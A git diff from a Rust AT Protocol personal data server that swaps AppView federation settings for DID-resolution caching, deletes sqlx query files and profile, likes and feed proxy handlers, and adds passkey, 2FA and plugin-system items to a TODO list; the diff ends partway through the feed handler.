+6
-18
.env.example
+6
-18
.env.example
···
48
# Optional: rotation key for PLC operations (defaults to user's key)
49
# PLC_ROTATION_KEY=did:key:...
50
# =============================================================================
51
-
# AppView Federation
52
# =============================================================================
53
-
# AppViews are resolved via DID-based discovery. Configure by mapping lexicon
54
-
# namespaces to AppView DIDs. The DID document is fetched and the service
55
-
# endpoint is extracted automatically.
56
-
#
57
-
# Format: APPVIEW_DID_<NAMESPACE>=<did>
58
-
# Where <NAMESPACE> uses underscores instead of dots (e.g., APP_BSKY for app.bsky)
59
-
#
60
-
# Default: app.bsky and com.atproto -> did:web:api.bsky.app
61
-
#
62
-
# Examples:
63
-
# APPVIEW_DID_APP_BSKY=did:web:api.bsky.app
64
-
# APPVIEW_DID_COM_WHTWND=did:web:whtwnd.com
65
-
# APPVIEW_DID_BLUE_ZIO=did:plc:some-custom-appview
66
-
#
67
-
# Cache TTL for resolved AppView endpoints (default: 300 seconds)
68
-
# APPVIEW_CACHE_TTL_SECS=300
69
-
#
70
# Comma-separated list of relay URLs to notify via requestCrawl
71
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
72
# =============================================================================
···
48
# Optional: rotation key for PLC operations (defaults to user's key)
49
# PLC_ROTATION_KEY=did:key:...
50
# =============================================================================
51
+
# DID Resolution
52
# =============================================================================
53
+
# Cache TTL for resolved DID documents (default: 300 seconds)
54
+
# DID_CACHE_TTL_SECS=300
55
+
# =============================================================================
56
+
# Relays
57
+
# =============================================================================
58
# Comma-separated list of relay URLs to notify via requestCrawl
59
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
60
# =============================================================================
-28
.sqlx/query-36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b.json
-28
.sqlx/query-36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "key_bytes",
9
-
"type_info": "Bytea"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "encryption_version",
14
-
"type_info": "Int4"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Text"
20
-
]
21
-
},
22
-
"nullable": [
23
-
false,
24
-
true
25
-
]
26
-
},
27
-
"hash": "36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b"
28
-
}
···
-46
.sqlx/query-4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456.json
-46
.sqlx/query-4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle\n FROM records r\n JOIN repos rp ON r.repo_id = rp.user_id\n JOIN users u ON rp.user_id = u.id\n WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'\n ORDER BY r.created_at DESC\n LIMIT 50",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "record_cid",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "rkey",
14
-
"type_info": "Text"
15
-
},
16
-
{
17
-
"ordinal": 2,
18
-
"name": "created_at",
19
-
"type_info": "Timestamptz"
20
-
},
21
-
{
22
-
"ordinal": 3,
23
-
"name": "did",
24
-
"type_info": "Text"
25
-
},
26
-
{
27
-
"ordinal": 4,
28
-
"name": "handle",
29
-
"type_info": "Text"
30
-
}
31
-
],
32
-
"parameters": {
33
-
"Left": [
34
-
"TextArray"
35
-
]
36
-
},
37
-
"nullable": [
38
-
false,
39
-
false,
40
-
false,
41
-
false,
42
-
false
43
-
]
44
-
},
45
-
"hash": "4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456"
46
-
}
···
-23
.sqlx/query-5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288.json
-23
.sqlx/query-5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "val",
9
-
"type_info": "Int4"
10
-
}
11
-
],
12
-
"parameters": {
13
-
"Left": [
14
-
"Uuid",
15
-
"Text"
16
-
]
17
-
},
18
-
"nullable": [
19
-
null
20
-
]
21
-
},
22
-
"hash": "5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288"
23
-
}
···
-22
.sqlx/query-94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f.json
-22
.sqlx/query-94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "record_cid",
9
-
"type_info": "Text"
10
-
}
11
-
],
12
-
"parameters": {
13
-
"Left": [
14
-
"Uuid"
15
-
]
16
-
},
17
-
"nullable": [
18
-
false
19
-
]
20
-
},
21
-
"hash": "94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f"
22
-
}
···
-22
.sqlx/query-a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc.json
-22
.sqlx/query-a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "record_cid",
9
-
"type_info": "Text"
10
-
}
11
-
],
12
-
"parameters": {
13
-
"Left": [
14
-
"Uuid"
15
-
]
16
-
},
17
-
"nullable": [
18
-
false
19
-
]
20
-
},
21
-
"hash": "a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc"
22
-
}
···
-47
.sqlx/query-f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e.json
-47
.sqlx/query-f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "\n SELECT record_cid, collection, rkey, created_at, repo_rev\n FROM records\n WHERE repo_id = $1 AND repo_rev > $2\n ORDER BY repo_rev ASC\n LIMIT 10\n ",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "record_cid",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "collection",
14
-
"type_info": "Text"
15
-
},
16
-
{
17
-
"ordinal": 2,
18
-
"name": "rkey",
19
-
"type_info": "Text"
20
-
},
21
-
{
22
-
"ordinal": 3,
23
-
"name": "created_at",
24
-
"type_info": "Timestamptz"
25
-
},
26
-
{
27
-
"ordinal": 4,
28
-
"name": "repo_rev",
29
-
"type_info": "Text"
30
-
}
31
-
],
32
-
"parameters": {
33
-
"Left": [
34
-
"Uuid",
35
-
"Text"
36
-
]
37
-
},
38
-
"nullable": [
39
-
false,
40
-
false,
41
-
false,
42
-
false,
43
-
true
44
-
]
45
-
},
46
-
"hash": "f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e"
47
-
}
···
+28
-11
TODO.md
+28
-11
TODO.md
···
38
- [ ] Log all actions with both actor DID and controller DID
39
- [ ] Audit log view for delegated account owners
40
41
-
### Passkey support
42
-
Modern passwordless authentication using WebAuthn/FIDO2, alongside or instead of passwords.
43
44
- [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name)
45
-
- [ ] Generate WebAuthn registration challenge
46
-
- [ ] Verify attestation response and store credential
47
-
- [ ] UI for registering new passkey from settings
48
-
- [ ] Detect if account has passkeys during OAuth authorize
49
-
- [ ] Offer passkey option alongside password
50
-
- [ ] Generate authentication challenge and verify assertion
51
-
- [ ] Update sign count (replay protection)
52
-
- [ ] Allow creating account with passkey instead of password
53
-
- [ ] List/rename/remove passkeys in settings
54
55
### Private/encrypted data
56
Records that only authorized parties can see and decrypt. Requires key federation between PDSes.
···
64
- [ ] Transparent encryption/decryption in repo operations
65
- [ ] Protocol for sharing decryption keys between PDSes
66
- [ ] Handle key rotation and revocation
67
68
---
69
···
38
- [ ] Log all actions with both actor DID and controller DID
39
- [ ] Audit log view for delegated account owners
40
41
+
### Passkeys and 2FA
42
+
Modern passwordless authentication using WebAuthn/FIDO2, plus TOTP for defense in depth.
43
44
- [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name)
45
+
- [ ] user_totp table (did, secret_encrypted, verified, created_at, last_used)
46
+
- [ ] WebAuthn registration challenge generation and attestation verification
47
+
- [ ] TOTP secret generation with QR code setup flow
48
+
- [ ] Backup codes (hashed, one-time use) with recovery flow
49
+
- [ ] OAuth authorize flow: password → 2FA (if enabled) → passkey (as alternative)
50
+
- [ ] Passkey-only account creation (no password)
51
+
- [ ] Settings UI for managing passkeys, TOTP, backup codes
52
+
- [ ] Trusted devices option (remember this browser)
53
+
- [ ] Rate limit 2FA attempts
54
+
- [ ] Re-auth for sensitive actions (email change, adding new auth methods)
55
56
### Private/encrypted data
57
Records that only authorized parties can see and decrypt. Requires key federation between PDSes.
···
65
- [ ] Transparent encryption/decryption in repo operations
66
- [ ] Protocol for sharing decryption keys between PDSes
67
- [ ] Handle key rotation and revocation
68
+
69
+
### Plugin system
70
+
Extensible architecture allowing third-party plugins to add functionality, like minecraft mods or browser extensions.
71
+
72
+
- [ ] Research: survey Fabric/Forge, VS Code, Grafana, Caddy plugin architectures
73
+
- [ ] Evaluate rust approaches: WASM, dynamic linking, subprocess IPC, embedded scripting (Lua/Rhai)
74
+
- [ ] Define security model (sandboxing, permissions, resource limits)
75
+
- [ ] Plugin manifest format (name, version, deps, permissions, hooks)
76
+
- [ ] Plugin discovery, loading, lifecycle (enable/disable/hot reload)
77
+
- [ ] Error isolation (bad plugin shouldn't crash PDS)
78
+
- [ ] Extension points: request middleware, record lifecycle hooks, custom XRPC endpoints
79
+
- [ ] Extension points: custom lexicons, storage backends, auth providers, notification channels
80
+
- [ ] Extension points: firehose consumers (react to repo events)
81
+
- [ ] Plugin SDK crate with traits and helpers
82
+
- [ ] Example plugins: custom feed algorithm, content filter, S3 backup
83
+
- [ ] Plugin registry with signature verification and version compatibility
84
85
---
86
-2
src/api/actor/mod.rs
-2
src/api/actor/mod.rs
-290
src/api/actor/profile.rs
-290
src/api/actor/profile.rs
···
1
-
use crate::api::proxy_client::proxy_client;
2
-
use crate::state::AppState;
3
-
use axum::{
4
-
Json,
5
-
extract::{Query, RawQuery, State},
6
-
http::StatusCode,
7
-
response::{IntoResponse, Response},
8
-
};
9
-
use jacquard_repo::storage::BlockStore;
10
-
use serde::{Deserialize, Serialize};
11
-
use serde_json::{Value, json};
12
-
use std::collections::HashMap;
13
-
use tracing::{error, info};
14
-
15
-
#[derive(Deserialize)]
16
-
pub struct GetProfileParams {
17
-
pub actor: String,
18
-
}
19
-
20
-
#[derive(Serialize, Deserialize, Clone)]
21
-
#[serde(rename_all = "camelCase")]
22
-
pub struct ProfileViewDetailed {
23
-
pub did: String,
24
-
pub handle: String,
25
-
#[serde(skip_serializing_if = "Option::is_none")]
26
-
pub display_name: Option<String>,
27
-
#[serde(skip_serializing_if = "Option::is_none")]
28
-
pub description: Option<String>,
29
-
#[serde(skip_serializing_if = "Option::is_none")]
30
-
pub avatar: Option<String>,
31
-
#[serde(skip_serializing_if = "Option::is_none")]
32
-
pub banner: Option<String>,
33
-
#[serde(flatten)]
34
-
pub extra: HashMap<String, Value>,
35
-
}
36
-
37
-
#[derive(Serialize, Deserialize)]
38
-
pub struct GetProfilesOutput {
39
-
pub profiles: Vec<ProfileViewDetailed>,
40
-
}
41
-
42
-
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
43
-
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
44
-
.fetch_optional(&state.db)
45
-
.await
46
-
.ok()??;
47
-
let record_row = sqlx::query!(
48
-
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
49
-
user_id
50
-
)
51
-
.fetch_optional(&state.db)
52
-
.await
53
-
.ok()??;
54
-
let cid: cid::Cid = record_row.record_cid.parse().ok()?;
55
-
let block_bytes = state.block_store.get(&cid).await.ok()??;
56
-
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
57
-
}
58
-
59
-
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
60
-
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
61
-
profile.display_name = Some(display_name.to_string());
62
-
}
63
-
if let Some(description) = local_record.get("description").and_then(|v| v.as_str()) {
64
-
profile.description = Some(description.to_string());
65
-
}
66
-
}
67
-
68
-
async fn proxy_to_appview(
69
-
state: &AppState,
70
-
method: &str,
71
-
params: &HashMap<String, String>,
72
-
auth_did: &str,
73
-
auth_key_bytes: Option<&[u8]>,
74
-
) -> Result<(StatusCode, Value), Response> {
75
-
let resolved = match state.appview_registry.get_appview_for_method(method).await {
76
-
Some(r) => r,
77
-
None => {
78
-
return Err((
79
-
StatusCode::BAD_GATEWAY,
80
-
Json(
81
-
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
82
-
),
83
-
)
84
-
.into_response());
85
-
}
86
-
};
87
-
let target_url = format!("{}/xrpc/{}", resolved.url, method);
88
-
info!("Proxying GET request to {}", target_url);
89
-
let client = proxy_client();
90
-
let request_builder = client.get(&target_url).query(params);
91
-
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
92
-
}
93
-
94
-
async fn proxy_to_appview_raw(
95
-
state: &AppState,
96
-
method: &str,
97
-
raw_query: Option<&str>,
98
-
auth_did: &str,
99
-
auth_key_bytes: Option<&[u8]>,
100
-
) -> Result<(StatusCode, Value), Response> {
101
-
let resolved = match state.appview_registry.get_appview_for_method(method).await {
102
-
Some(r) => r,
103
-
None => {
104
-
return Err((
105
-
StatusCode::BAD_GATEWAY,
106
-
Json(
107
-
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
108
-
),
109
-
)
110
-
.into_response());
111
-
}
112
-
};
113
-
let target_url = match raw_query {
114
-
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
115
-
None => format!("{}/xrpc/{}", resolved.url, method),
116
-
};
117
-
info!("Proxying GET request to {}", target_url);
118
-
let client = proxy_client();
119
-
let request_builder = client.get(&target_url);
120
-
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
121
-
}
122
-
123
-
async fn proxy_request(
124
-
mut request_builder: reqwest::RequestBuilder,
125
-
auth_did: &str,
126
-
auth_key_bytes: Option<&[u8]>,
127
-
method: &str,
128
-
appview_did: &str,
129
-
) -> Result<(StatusCode, Value), Response> {
130
-
if let Some(key_bytes) = auth_key_bytes {
131
-
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
132
-
Ok(service_token) => {
133
-
request_builder =
134
-
request_builder.header("Authorization", format!("Bearer {}", service_token));
135
-
}
136
-
Err(e) => {
137
-
error!("Failed to create service token: {:?}", e);
138
-
return Err((
139
-
StatusCode::INTERNAL_SERVER_ERROR,
140
-
Json(json!({"error": "InternalError"})),
141
-
)
142
-
.into_response());
143
-
}
144
-
}
145
-
}
146
-
match request_builder.send().await {
147
-
Ok(resp) => {
148
-
let status =
149
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
150
-
match resp.json::<Value>().await {
151
-
Ok(body) => Ok((status, body)),
152
-
Err(e) => {
153
-
error!("Error parsing proxy response: {:?}", e);
154
-
Err((
155
-
StatusCode::BAD_GATEWAY,
156
-
Json(json!({"error": "UpstreamError"})),
157
-
)
158
-
.into_response())
159
-
}
160
-
}
161
-
}
162
-
Err(e) => {
163
-
error!("Error sending proxy request: {:?}", e);
164
-
if e.is_timeout() {
165
-
Err((
166
-
StatusCode::GATEWAY_TIMEOUT,
167
-
Json(json!({"error": "UpstreamTimeout"})),
168
-
)
169
-
.into_response())
170
-
} else {
171
-
Err((
172
-
StatusCode::BAD_GATEWAY,
173
-
Json(json!({"error": "UpstreamError"})),
174
-
)
175
-
.into_response())
176
-
}
177
-
}
178
-
}
179
-
}
180
-
181
-
pub async fn get_profile(
182
-
State(state): State<AppState>,
183
-
headers: axum::http::HeaderMap,
184
-
Query(params): Query<GetProfileParams>,
185
-
) -> Response {
186
-
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
187
-
let auth_user = if let Some(h) = auth_header {
188
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
189
-
crate::auth::validate_bearer_token(&state.db, &token)
190
-
.await
191
-
.ok()
192
-
} else {
193
-
None
194
-
}
195
-
} else {
196
-
None
197
-
};
198
-
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
199
-
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
200
-
let mut query_params = HashMap::new();
201
-
query_params.insert("actor".to_string(), params.actor.clone());
202
-
let (status, body) = match proxy_to_appview(
203
-
&state,
204
-
"app.bsky.actor.getProfile",
205
-
&query_params,
206
-
auth_did.as_deref().unwrap_or(""),
207
-
auth_key_bytes.as_deref(),
208
-
)
209
-
.await
210
-
{
211
-
Ok(r) => r,
212
-
Err(e) => return e,
213
-
};
214
-
if !status.is_success() {
215
-
return (status, Json(body)).into_response();
216
-
}
217
-
let mut profile: ProfileViewDetailed = match serde_json::from_value(body) {
218
-
Ok(p) => p,
219
-
Err(_) => {
220
-
return (
221
-
StatusCode::BAD_GATEWAY,
222
-
Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})),
223
-
)
224
-
.into_response();
225
-
}
226
-
};
227
-
if let Some(ref did) = auth_did
228
-
&& profile.did == *did
229
-
&& let Some(local_record) = get_local_profile_record(&state, did).await {
230
-
munge_profile_with_local(&mut profile, &local_record);
231
-
}
232
-
(StatusCode::OK, Json(profile)).into_response()
233
-
}
234
-
235
-
pub async fn get_profiles(
236
-
State(state): State<AppState>,
237
-
headers: axum::http::HeaderMap,
238
-
RawQuery(raw_query): RawQuery,
239
-
) -> Response {
240
-
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
241
-
let auth_user = if let Some(h) = auth_header {
242
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
243
-
crate::auth::validate_bearer_token(&state.db, &token)
244
-
.await
245
-
.ok()
246
-
} else {
247
-
None
248
-
}
249
-
} else {
250
-
None
251
-
};
252
-
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
253
-
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
254
-
let (status, body) = match proxy_to_appview_raw(
255
-
&state,
256
-
"app.bsky.actor.getProfiles",
257
-
raw_query.as_deref(),
258
-
auth_did.as_deref().unwrap_or(""),
259
-
auth_key_bytes.as_deref(),
260
-
)
261
-
.await
262
-
{
263
-
Ok(r) => r,
264
-
Err(e) => return e,
265
-
};
266
-
if !status.is_success() {
267
-
return (status, Json(body)).into_response();
268
-
}
269
-
let mut output: GetProfilesOutput = match serde_json::from_value(body) {
270
-
Ok(p) => p,
271
-
Err(_) => {
272
-
return (
273
-
StatusCode::BAD_GATEWAY,
274
-
Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})),
275
-
)
276
-
.into_response();
277
-
}
278
-
};
279
-
if let Some(ref did) = auth_did {
280
-
for profile in &mut output.profiles {
281
-
if profile.did == *did {
282
-
if let Some(local_record) = get_local_profile_record(&state, did).await {
283
-
munge_profile_with_local(profile, &local_record);
284
-
}
285
-
break;
286
-
}
287
-
}
288
-
}
289
-
(StatusCode::OK, Json(output)).into_response()
290
-
}
···
-158
src/api/feed/actor_likes.rs
-158
src/api/feed/actor_likes.rs
···
1
-
use crate::api::read_after_write::{
2
-
FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev,
3
-
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
4
-
};
5
-
use crate::state::AppState;
6
-
use axum::{
7
-
Json,
8
-
extract::{Query, State},
9
-
http::StatusCode,
10
-
response::{IntoResponse, Response},
11
-
};
12
-
use serde::Deserialize;
13
-
use serde_json::Value;
14
-
use std::collections::HashMap;
15
-
use tracing::warn;
16
-
17
-
#[derive(Deserialize)]
18
-
pub struct GetActorLikesParams {
19
-
pub actor: String,
20
-
pub limit: Option<u32>,
21
-
pub cursor: Option<String>,
22
-
}
23
-
24
-
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
25
-
for like in likes {
26
-
let like_time = &like.indexed_at.to_rfc3339();
27
-
let idx = feed
28
-
.iter()
29
-
.position(|fi| &fi.post.indexed_at < like_time)
30
-
.unwrap_or(feed.len());
31
-
let placeholder_post = PostView {
32
-
uri: like.record.subject.uri.clone(),
33
-
cid: like.record.subject.cid.clone(),
34
-
author: crate::api::read_after_write::AuthorView {
35
-
did: String::new(),
36
-
handle: String::new(),
37
-
display_name: None,
38
-
avatar: None,
39
-
extra: HashMap::new(),
40
-
},
41
-
record: Value::Null,
42
-
indexed_at: like.indexed_at.to_rfc3339(),
43
-
embed: None,
44
-
reply_count: 0,
45
-
repost_count: 0,
46
-
like_count: 0,
47
-
quote_count: 0,
48
-
extra: HashMap::new(),
49
-
};
50
-
feed.insert(
51
-
idx,
52
-
FeedViewPost {
53
-
post: placeholder_post,
54
-
reply: None,
55
-
reason: None,
56
-
feed_context: None,
57
-
extra: HashMap::new(),
58
-
},
59
-
);
60
-
}
61
-
}
62
-
63
-
pub async fn get_actor_likes(
64
-
State(state): State<AppState>,
65
-
headers: axum::http::HeaderMap,
66
-
Query(params): Query<GetActorLikesParams>,
67
-
) -> Response {
68
-
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
69
-
let auth_user = if let Some(h) = auth_header {
70
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
71
-
crate::auth::validate_bearer_token(&state.db, &token)
72
-
.await
73
-
.ok()
74
-
} else {
75
-
None
76
-
}
77
-
} else {
78
-
None
79
-
};
80
-
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
81
-
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
82
-
let mut query_params = HashMap::new();
83
-
query_params.insert("actor".to_string(), params.actor.clone());
84
-
if let Some(limit) = params.limit {
85
-
query_params.insert("limit".to_string(), limit.to_string());
86
-
}
87
-
if let Some(cursor) = ¶ms.cursor {
88
-
query_params.insert("cursor".to_string(), cursor.clone());
89
-
}
90
-
let proxy_result = match proxy_to_appview_via_registry(
91
-
&state,
92
-
"app.bsky.feed.getActorLikes",
93
-
&query_params,
94
-
auth_did.as_deref().unwrap_or(""),
95
-
auth_key_bytes.as_deref(),
96
-
)
97
-
.await
98
-
{
99
-
Ok(r) => r,
100
-
Err(e) => return e,
101
-
};
102
-
if !proxy_result.status.is_success() {
103
-
return proxy_result.into_response();
104
-
}
105
-
let rev = match extract_repo_rev(&proxy_result.headers) {
106
-
Some(r) => r,
107
-
None => return proxy_result.into_response(),
108
-
};
109
-
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
110
-
Ok(f) => f,
111
-
Err(e) => {
112
-
warn!("Failed to parse actor likes response: {:?}", e);
113
-
return proxy_result.into_response();
114
-
}
115
-
};
116
-
let requester_did = match &auth_did {
117
-
Some(d) => d.clone(),
118
-
None => return (StatusCode::OK, Json(feed_output)).into_response(),
119
-
};
120
-
let actor_did = if params.actor.starts_with("did:") {
121
-
params.actor.clone()
122
-
} else {
123
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
124
-
let suffix = format!(".{}", hostname);
125
-
let short_handle = if params.actor.ends_with(&suffix) {
126
-
params.actor.strip_suffix(&suffix).unwrap_or(¶ms.actor)
127
-
} else {
128
-
¶ms.actor
129
-
};
130
-
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
131
-
.fetch_optional(&state.db)
132
-
.await
133
-
{
134
-
Ok(Some(did)) => did,
135
-
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
136
-
Err(e) => {
137
-
warn!("Database error resolving actor handle: {:?}", e);
138
-
return proxy_result.into_response();
139
-
}
140
-
}
141
-
};
142
-
if actor_did != requester_did {
143
-
return (StatusCode::OK, Json(feed_output)).into_response();
144
-
}
145
-
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
146
-
Ok(r) => r,
147
-
Err(e) => {
148
-
warn!("Failed to get local records: {}", e);
149
-
return proxy_result.into_response();
150
-
}
151
-
};
152
-
if local_records.likes.is_empty() {
153
-
return (StatusCode::OK, Json(feed_output)).into_response();
154
-
}
155
-
insert_likes_into_feed(&mut feed_output.feed, &local_records.likes);
156
-
let lag = get_local_lag(&local_records);
157
-
format_munged_response(feed_output, lag)
158
-
}
···
-131
src/api/feed/custom_feed.rs
-131
src/api/feed/custom_feed.rs
···
1
-
use crate::api::ApiError;
2
-
use crate::api::proxy_client::{
3
-
MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit,
4
-
};
5
-
use crate::state::AppState;
6
-
use axum::{
7
-
extract::{Query, State},
8
-
http::StatusCode,
9
-
response::{IntoResponse, Response},
10
-
};
11
-
use serde::Deserialize;
12
-
use std::collections::HashMap;
13
-
use tracing::{error, info};
14
-
15
-
#[derive(Deserialize)]
16
-
pub struct GetFeedParams {
17
-
pub feed: String,
18
-
pub limit: Option<u32>,
19
-
pub cursor: Option<String>,
20
-
}
21
-
22
-
pub async fn get_feed(
23
-
State(state): State<AppState>,
24
-
headers: axum::http::HeaderMap,
25
-
Query(params): Query<GetFeedParams>,
26
-
) -> Response {
27
-
let token = match crate::auth::extract_bearer_token_from_header(
28
-
headers.get("Authorization").and_then(|h| h.to_str().ok()),
29
-
) {
30
-
Some(t) => t,
31
-
None => return ApiError::AuthenticationRequired.into_response(),
32
-
};
33
-
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
34
-
Ok(user) => user,
35
-
Err(e) => return ApiError::from(e).into_response(),
36
-
};
37
-
if let Err(e) = validate_at_uri(¶ms.feed) {
38
-
return ApiError::InvalidRequest(format!("Invalid feed URI: {}", e)).into_response();
39
-
}
40
-
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.feed.getFeed").await {
41
-
Some(r) => r,
42
-
None => {
43
-
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.feed.getFeed".to_string())
44
-
.into_response();
45
-
}
46
-
};
47
-
if let Err(e) = is_ssrf_safe(&resolved.url) {
48
-
error!("SSRF check failed for appview URL: {}", e);
49
-
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
50
-
.into_response();
51
-
}
52
-
let limit = validate_limit(params.limit, 50, 100);
53
-
let mut query_params = HashMap::new();
54
-
query_params.insert("feed".to_string(), params.feed.clone());
55
-
query_params.insert("limit".to_string(), limit.to_string());
56
-
if let Some(cursor) = ¶ms.cursor {
57
-
query_params.insert("cursor".to_string(), cursor.clone());
58
-
}
59
-
let target_url = format!("{}/xrpc/app.bsky.feed.getFeed", resolved.url);
60
-
info!(target = %target_url, feed = %params.feed, "Proxying getFeed request");
61
-
let client = proxy_client();
62
-
let mut request_builder = client.get(&target_url).query(&query_params);
63
-
if let Some(key_bytes) = auth_user.key_bytes.as_ref() {
64
-
match crate::auth::create_service_token(
65
-
&auth_user.did,
66
-
&resolved.did,
67
-
"app.bsky.feed.getFeed",
68
-
key_bytes,
69
-
) {
70
-
Ok(service_token) => {
71
-
request_builder =
72
-
request_builder.header("Authorization", format!("Bearer {}", service_token));
73
-
}
74
-
Err(e) => {
75
-
error!(error = ?e, "Failed to create service token for getFeed");
76
-
return ApiError::InternalError.into_response();
77
-
}
78
-
}
79
-
}
80
-
match request_builder.send().await {
81
-
Ok(resp) => {
82
-
let status =
83
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
84
-
let content_length = resp.content_length().unwrap_or(0);
85
-
if content_length > MAX_RESPONSE_SIZE {
86
-
error!(
87
-
content_length,
88
-
max = MAX_RESPONSE_SIZE,
89
-
"getFeed response too large"
90
-
);
91
-
return ApiError::UpstreamFailure.into_response();
92
-
}
93
-
let resp_headers = resp.headers().clone();
94
-
let body = match resp.bytes().await {
95
-
Ok(b) => {
96
-
if b.len() as u64 > MAX_RESPONSE_SIZE {
97
-
error!(len = b.len(), "getFeed response body exceeded limit");
98
-
return ApiError::UpstreamFailure.into_response();
99
-
}
100
-
b
101
-
}
102
-
Err(e) => {
103
-
error!(error = ?e, "Error reading getFeed response");
104
-
return ApiError::UpstreamFailure.into_response();
105
-
}
106
-
};
107
-
let mut response_builder = axum::response::Response::builder().status(status);
108
-
